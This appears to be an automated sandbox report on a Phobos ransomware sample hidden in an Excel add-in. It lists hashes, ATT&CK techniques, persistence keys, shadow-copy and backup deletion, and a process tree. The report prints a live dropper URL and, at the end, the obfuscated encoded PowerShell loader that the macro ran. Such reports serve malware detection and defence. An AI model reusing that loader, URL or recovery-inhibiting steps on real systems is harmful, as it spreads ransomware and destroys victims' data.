phobos | 4b0283887cb078283226d968eb5f33300d3eefd72faf0ca2e72f8421b1e67c94

Analysis

max time kernel
151s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
28-01-2024 10:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

426284b7dedb929129687303f1bf7e4def607f404c93f7736d17241e43f0ab33.xlam
Size

22KB
MD5

fe4409bf10488b02442cadeb85e000d2
SHA1

17125f4ece6483933eb6646a16cd2859389a938a
SHA256

426284b7dedb929129687303f1bf7e4def607f404c93f7736d17241e43f0ab33
SHA512

ad75086c169d9680d87283de9726dca9721d8746377f5144f7385a7522bee42eacda2b0037426751e79593ac2a0c76207dd906d08ac4188716fb5c73c86e5227
SSDEEP

384:AKlevd/K/C9tqsXdt2tH5cLun2Y7WUNS4VF/J9/iuJsMOawaW0E1JPTp8gF5iz:AKlQ/mGtfYSL+2Y7x4UF/J96SxOdarCm

Score

10^/10

phobos evasion persistence ransomware

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://gitea.com/JoinPokingo/JingaPol/raw/branch/main/cfmifs_CRPT.txt

Signatures

Phobos
Phobos ransomware appeared at the beginning of 2019.
ransomware phobos

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4624	2396	cmd.exe	EXCEL.EXE

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

AVG update.exe

description pid process target process

PID 1276 created 3540 1276 AVG update.exe Explorer.EXE
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

4548 bcdedit.exe
1436 bcdedit.exe
Renames multiple (116) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

30 1364 powershell.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

1304 wbadmin.exe
Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

4300 netsh.exe
1540 netsh.exe

description	pid	process	target process
PID 1276 created 3540	1276	AVG update.exe	Explorer.EXE

pid	process
4548	bcdedit.exe
1436	bcdedit.exe

flow	pid	process
30	1364	powershell.exe

pid	process
1304	wbadmin.exe

pid	process
4300	netsh.exe
1540	netsh.exe

Drops startup file 1 IoCs

Processes:

SmartScreen Defender Windows.exe

description	ioc	process
File created	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\SmartScreen Defender Windows.exe	SmartScreen Defender Windows.exe

Executes dropped EXE 3 IoCs

Processes:

AVG update.exeSmartScreen Defender Windows.exeSmartScreen Defender Windows.exe

pid process

1276 AVG update.exe
988 SmartScreen Defender Windows.exe
3264 SmartScreen Defender Windows.exe
Loads dropped DLL 1 IoCs

Processes:

AVG update.exe

pid process

1276 AVG update.exe

pid	process
1276	AVG update.exe
988	SmartScreen Defender Windows.exe
3264	SmartScreen Defender Windows.exe

pid	process
1276	AVG update.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

SmartScreen Defender Windows.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmartScreen Defender Windows = "C:\\Users\\Admin\\AppData\\Local\\SmartScreen Defender Windows.exe"	SmartScreen Defender Windows.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmartScreen Defender Windows = "C:\\Users\\Admin\\AppData\\Local\\SmartScreen Defender Windows.exe"	SmartScreen Defender Windows.exe

Drops desktop.ini file(s) 3 IoCs

Processes:

SmartScreen Defender Windows.exe

description	ioc	process
File opened for modification	C:\$Recycle.Bin\S-1-5-21-3073191680-435865314-2862784915-1000\desktop.ini	SmartScreen Defender Windows.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-3073191680-435865314-2862784915-1000\desktop.ini	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\desktop.ini	SmartScreen Defender Windows.exe

Drops file in Program Files directory 64 IoCs

Processes:

SmartScreen Defender Windows.exe

description	ioc	process
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\System.Runtime.Intrinsics.dll	SmartScreen Defender Windows.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\cs\System.Windows.Forms.Primitives.resources.dll.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File created	C:\Program Files\Java\jre-1.8\lib\jce.jar.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\fr\PresentationUI.resources.dll	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\System.Resources.Extensions.dll	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome.dll.sig	SmartScreen Defender Windows.exe
File created	C:\Program Files\Java\jre-1.8\legal\jdk\pkcs11wrapper.md.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\orbd.exe	SmartScreen Defender Windows.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\AccessRuntimeR_PrepidBypass-ul-oob.xrm-ms.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ipssrb.xml	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\System.IO.dll	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\System.Xml.Serialization.dll	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\System.Diagnostics.Contracts.dll	SmartScreen Defender Windows.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\System.Security.Cryptography.Pkcs.dll.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\System.Drawing.dll	SmartScreen Defender Windows.exe
File created	C:\Program Files\Java\jre-1.8\legal\jdk\asm.md.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.vi-vn.dll	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\System.ObjectModel.dll	SmartScreen Defender Windows.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\de\UIAutomationClient.resources.dll.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File created	C:\Program Files\Java\jdk-1.8\bin\api-ms-win-crt-utility-l1-1-0.dll.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File created	C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-debug-l1-1-0.dll.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\msvcp140_2.dll	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ipssrl.xml	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\ko\System.Windows.Input.Manipulations.resources.dll	SmartScreen Defender Windows.exe
File created	C:\Program Files\Java\jre-1.8\legal\jdk\bcel.md.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Java\jre-1.8\README.txt	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\en-US\ShapeCollector.exe.mui	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\ja-JP\oledb32r.dll.mui	SmartScreen Defender Windows.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\ru\PresentationUI.resources.dll.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\zh-Hant\ReachFramework.resources.dll.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\d3dcompiler_47.dll.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\cursors.properties	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Retail-ppd.xrm-ms	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RCom.dll.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\PresentationFramework.Luna.dll.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File created	C:\Program Files\Java\jre-1.8\lib\cmm\PYCC.pf.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\de-DE\InkObj.dll.mui	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\api-ms-win-core-processthreads-l1-1-1.dll	SmartScreen Defender Windows.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\System.Reflection.TypeExtensions.dll.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\it\System.Windows.Forms.Design.resources.dll	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\vulkan-1.dll	SmartScreen Defender Windows.exe
File created	C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\System.Security.Cryptography.Xml.dll.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File created	C:\Program Files\InstallShow.001.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File created	C:\Program Files\Java\jdk-1.8\jre\bin\policytool.exe.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File created	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Times New Roman-Arial.xml.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\api-ms-win-crt-locale-l1-1-0.dll	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\legal\jdk\zlib.md	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\jjs.exe	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\jp2ssv.dll	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\pt-BR\System.Windows.Controls.Ribbon.resources.dll	SmartScreen Defender Windows.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\tr\PresentationUI.resources.dll.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\WindowsFormsIntegration.dll.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\zh-Hans\System.Xaml.resources.dll	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\api-ms-win-crt-filesystem-l1-1-0.dll	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\msvcp140.dll	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-bridge-office.xrm-ms	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\msadce.dll	SmartScreen Defender Windows.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\System.Diagnostics.Process.dll.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\manifest.json	SmartScreen Defender Windows.exe
File created	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Frosted Glass.eftx.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\oledb32.dll	SmartScreen Defender Windows.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\System.Net.Mail.dll	SmartScreen Defender Windows.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\System.Xml.XPath.dll.id[5095EB67-3512].[[email protected]].faust	SmartScreen Defender Windows.exe

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vds.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

3376 vssadmin.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1600 taskkill.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4144 PING.EXE
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 29 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2396 EXCEL.EXE

pid	process
3376	vssadmin.exe

pid	process
1600	taskkill.exe

pid	process
4144	PING.EXE

description	flow	ioc
HTTP User-Agent header	29	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeSmartScreen Defender Windows.exe

pid	process
1364	powershell.exe
1364	powershell.exe
3932	powershell.exe
3932	powershell.exe
3932	powershell.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe
988	SmartScreen Defender Windows.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs

Processes:

AVG update.exe

pid process

1276 AVG update.exe

pid	process
1276	AVG update.exe

Suspicious use of AdjustPrivilegeToken 52 IoCs

Processes:

powershell.exetaskkill.exepowershell.exeSmartScreen Defender Windows.exevssvc.exeWMIC.exewbengine.exe

description	pid	process
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeDebugPrivilege	1600	taskkill.exe
Token: SeDebugPrivilege	3932	powershell.exe
Token: SeDebugPrivilege	988	SmartScreen Defender Windows.exe
Token: SeBackupPrivilege	1860	vssvc.exe
Token: SeRestorePrivilege	1860	vssvc.exe
Token: SeAuditPrivilege	1860	vssvc.exe
Token: SeIncreaseQuotaPrivilege	208	WMIC.exe
Token: SeSecurityPrivilege	208	WMIC.exe
Token: SeTakeOwnershipPrivilege	208	WMIC.exe
Token: SeLoadDriverPrivilege	208	WMIC.exe
Token: SeSystemProfilePrivilege	208	WMIC.exe
Token: SeSystemtimePrivilege	208	WMIC.exe
Token: SeProfSingleProcessPrivilege	208	WMIC.exe
Token: SeIncBasePriorityPrivilege	208	WMIC.exe
Token: SeCreatePagefilePrivilege	208	WMIC.exe
Token: SeBackupPrivilege	208	WMIC.exe
Token: SeRestorePrivilege	208	WMIC.exe
Token: SeShutdownPrivilege	208	WMIC.exe
Token: SeDebugPrivilege	208	WMIC.exe
Token: SeSystemEnvironmentPrivilege	208	WMIC.exe
Token: SeRemoteShutdownPrivilege	208	WMIC.exe
Token: SeUndockPrivilege	208	WMIC.exe
Token: SeManageVolumePrivilege	208	WMIC.exe
Token: 33	208	WMIC.exe
Token: 34	208	WMIC.exe
Token: 35	208	WMIC.exe
Token: 36	208	WMIC.exe
Token: SeIncreaseQuotaPrivilege	208	WMIC.exe
Token: SeSecurityPrivilege	208	WMIC.exe
Token: SeTakeOwnershipPrivilege	208	WMIC.exe
Token: SeLoadDriverPrivilege	208	WMIC.exe
Token: SeSystemProfilePrivilege	208	WMIC.exe
Token: SeSystemtimePrivilege	208	WMIC.exe
Token: SeProfSingleProcessPrivilege	208	WMIC.exe
Token: SeIncBasePriorityPrivilege	208	WMIC.exe
Token: SeCreatePagefilePrivilege	208	WMIC.exe
Token: SeBackupPrivilege	208	WMIC.exe
Token: SeRestorePrivilege	208	WMIC.exe
Token: SeShutdownPrivilege	208	WMIC.exe
Token: SeDebugPrivilege	208	WMIC.exe
Token: SeSystemEnvironmentPrivilege	208	WMIC.exe
Token: SeRemoteShutdownPrivilege	208	WMIC.exe
Token: SeUndockPrivilege	208	WMIC.exe
Token: SeManageVolumePrivilege	208	WMIC.exe
Token: 33	208	WMIC.exe
Token: 34	208	WMIC.exe
Token: 35	208	WMIC.exe
Token: 36	208	WMIC.exe
Token: SeBackupPrivilege	4680	wbengine.exe
Token: SeRestorePrivilege	4680	wbengine.exe
Token: SeSecurityPrivilege	4680	wbengine.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

EXCEL.EXE

pid process

2396 EXCEL.EXE
2396 EXCEL.EXE

Suspicious use of SetWindowsHookEx 16 IoCs

Processes:

EXCEL.EXE

pid	process
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE

Suspicious use of WriteProcessMemory 45 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exeAVG update.execmd.execsc.execmd.execmd.execmd.exeSmartScreen Defender Windows.execmd.execmd.exe

description	pid	process	target process
PID 2396 wrote to memory of 4624	2396	EXCEL.EXE	cmd.exe
PID 2396 wrote to memory of 4624	2396	EXCEL.EXE	cmd.exe
PID 4624 wrote to memory of 1364	4624	cmd.exe	powershell.exe
PID 4624 wrote to memory of 1364	4624	cmd.exe	powershell.exe
PID 1364 wrote to memory of 1276	1364	powershell.exe	AVG update.exe
PID 1364 wrote to memory of 1276	1364	powershell.exe	AVG update.exe
PID 1276 wrote to memory of 4572	1276	AVG update.exe	cmd.exe
PID 1276 wrote to memory of 4572	1276	AVG update.exe	cmd.exe
PID 4572 wrote to memory of 1600	4572	cmd.exe	taskkill.exe
PID 4572 wrote to memory of 1600	4572	cmd.exe	taskkill.exe
PID 1276 wrote to memory of 3724	1276	AVG update.exe	csc.exe
PID 1276 wrote to memory of 3724	1276	AVG update.exe	csc.exe
PID 3724 wrote to memory of 3064	3724	csc.exe	cvtres.exe
PID 3724 wrote to memory of 3064	3724	csc.exe	cvtres.exe
PID 1276 wrote to memory of 3692	1276	AVG update.exe	cmd.exe
PID 1276 wrote to memory of 3692	1276	AVG update.exe	cmd.exe
PID 3692 wrote to memory of 3932	3692	cmd.exe	powershell.exe
PID 3692 wrote to memory of 3932	3692	cmd.exe	powershell.exe
PID 1276 wrote to memory of 2320	1276	AVG update.exe	cmd.exe
PID 1276 wrote to memory of 2320	1276	AVG update.exe	cmd.exe
PID 2320 wrote to memory of 652	2320	cmd.exe	curl.exe
PID 2320 wrote to memory of 652	2320	cmd.exe	curl.exe
PID 1276 wrote to memory of 988	1276	AVG update.exe	SmartScreen Defender Windows.exe
PID 1276 wrote to memory of 4660	1276	AVG update.exe	cmd.exe
PID 1276 wrote to memory of 4660	1276	AVG update.exe	cmd.exe
PID 4660 wrote to memory of 4144	4660	cmd.exe	PING.EXE
PID 4660 wrote to memory of 4144	4660	cmd.exe	PING.EXE
PID 988 wrote to memory of 3032	988	SmartScreen Defender Windows.exe	cmd.exe
PID 988 wrote to memory of 3032	988	SmartScreen Defender Windows.exe	cmd.exe
PID 988 wrote to memory of 1136	988	SmartScreen Defender Windows.exe	cmd.exe
PID 988 wrote to memory of 1136	988	SmartScreen Defender Windows.exe	cmd.exe
PID 3032 wrote to memory of 3376	3032	cmd.exe	vssadmin.exe
PID 3032 wrote to memory of 3376	3032	cmd.exe	vssadmin.exe
PID 1136 wrote to memory of 4300	1136	cmd.exe	netsh.exe
PID 1136 wrote to memory of 4300	1136	cmd.exe	netsh.exe
PID 1136 wrote to memory of 1540	1136	cmd.exe	netsh.exe
PID 1136 wrote to memory of 1540	1136	cmd.exe	netsh.exe
PID 3032 wrote to memory of 208	3032	cmd.exe	WMIC.exe
PID 3032 wrote to memory of 208	3032	cmd.exe	WMIC.exe
PID 3032 wrote to memory of 4548	3032	cmd.exe	bcdedit.exe
PID 3032 wrote to memory of 4548	3032	cmd.exe	bcdedit.exe
PID 3032 wrote to memory of 1436	3032	cmd.exe	bcdedit.exe
PID 3032 wrote to memory of 1436	3032	cmd.exe	bcdedit.exe
PID 3032 wrote to memory of 1304	3032	cmd.exe	wbadmin.exe
PID 3032 wrote to memory of 1304	3032	cmd.exe	wbadmin.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3540

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\426284b7dedb929129687303f1bf7e4def607f404c93f7736d17241e43f0ab33.xlam"
2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2396

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -EncodedCommand IAAuACAAKAAgACQAZQBuAHYAOgBDAG8AbQBTAFAARQBjAFsANAAsADIANAAsADIANQBdAC0ASgBPAGkAbgAnACcAKQAoAG4ARQB3AC0ATwBiAEoARQBDAFQAIAAgAGkATwAuAGMAbwBNAFAAcgBlAFMAcwBJAE8ATgAuAEQARQBmAGwAYQB0AEUAUwBUAHIAZQBhAG0AKABbAFMAWQBzAFQAZQBtAC4ASQBPAC4AbQBlAG0AbwByAFkAUwB0AHIARQBhAE0AXQAgAFsAUwB5AHMAdABlAE0ALgBjAG8ATgBWAGUAUgBUAF0AOgA6AEYAcgBPAG0AYgBhAFMARQA2ADQAUwB0AHIAaQBOAGcAKAAnAGIAVgBYAHYAYwA1AHAAWQBGAFAAMgBlAG0AZgB3AFAAYgB4AHkAMwA2AEwAYQBRAGEATgBwAGsAbQA1ADMAOQBRAEIAUQBUAFUANABJAE8AWQBqAHAAcAAwAHUAawBsACsAbwBnADAAQwBCAFkAeABQADQAYgBsAGYAOQA5AHoASAAyAEoAMAB0AGgAOQA4AEkATAB4ADMANwB6AG4AbgAzAG4AcwBRAG8AdgA2AFkASABwADEAOABzADgAVQAvAFEAdAB4AG0ATgB3AHYANQB2AFYASABMADIAMABYAGUASwB2AEwARABvAHEAYgAzAHQAQwBzAGoASABCAGgARAAzADcAdgBRAFAAbQBpAGoAVABHAEoAZAAzAG0AagBOAHYANABWAFkAWABvAHYASAB5ADUATQBqAEkAUgBvADQANgBiADAATwAxAGMAbgBxAG0ATgBDAE0AbwBCAC8AeAA3AG4ANgBpAE4AWQBWAG8AQwBqADQAaABNADcAMgBmAHkAVABtAE8AYQBFADkAbQBxAHIAMwBYACsAaQBhAFcAZQAxAHUAZQBJAGoAUAB1ADIAdABqAGEAdQBQAFYAdQBkAG0ATgBwAFQAMQBiAHEASQBWAEkAbgBjAGMAcABRAEgASwB1AGUAcgA4AGkAMQBDADgARABHAHoAaABQAGcAUABTAHoAeQBvAHkASgB2ADQAOQBKAGkAKwBIAC8AaABoAC8AOAB0AEIAUABsAGMANQBKADgANABWAFAANgB4AFUATQB4AHcAYQBlAEUAQgA3AHoAaABSAFIASQArAHgAWQBsAFAAcgB1AEsAZwBKAFAAUgBEAGEARQBNAG4AOABNAEQANwBnAEMAMwA0AEgARAB5AEgAVwBKAEQA